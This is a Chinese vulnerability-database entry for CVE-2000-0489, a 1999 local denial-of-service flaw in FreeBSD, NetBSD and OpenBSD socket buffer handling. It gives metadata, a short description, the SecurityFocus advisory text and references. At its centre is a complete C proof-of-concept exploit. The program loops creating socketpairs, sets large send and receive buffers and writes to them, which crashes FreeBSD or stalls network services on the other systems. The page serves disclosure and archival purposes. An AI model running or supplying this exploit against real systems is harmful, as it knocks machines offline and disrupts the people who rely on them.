多厂商setsocopt()拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105533 漏洞类型 其他
发布时间 1999-09-05 更新时间 2005-05-02
CVE编号 CVE-2000-0489 CNNVD-ID CNNVD-199909-012
漏洞平台 BSD CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/19488
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-012
|漏洞详情
FreeBSD,NetBSD以及OpenBSD存在漏洞。攻击者通过使用socketpair函数创建大量套接字对,并用setsockopt设置大规模缓存并写入内容的方法导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/622/info

A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding.

Details behind why this happens have not been made available. 

#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];

while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}
|参考资料

来源:XF
名称:bsd-setsockopt-dos
链接:http://xforce.iss.net/static/3298.php
来源:BUGTRAQ
名称:19990826LocalDoSinFreeBSD
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.9908270039010.16315-100000@thetis.deor.org
来源:BUGTRAQ
名称:20000601LocalFreeBSD,Openbsd,NetBSD,DoSVulnerability-MacOSXaffected
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=NCBBKFKDOLAGKIAPMILPCEJLCEAA.labs@ussrback.com
来源:BID
名称:622
链接:http://www.securityfocus.com/bid/622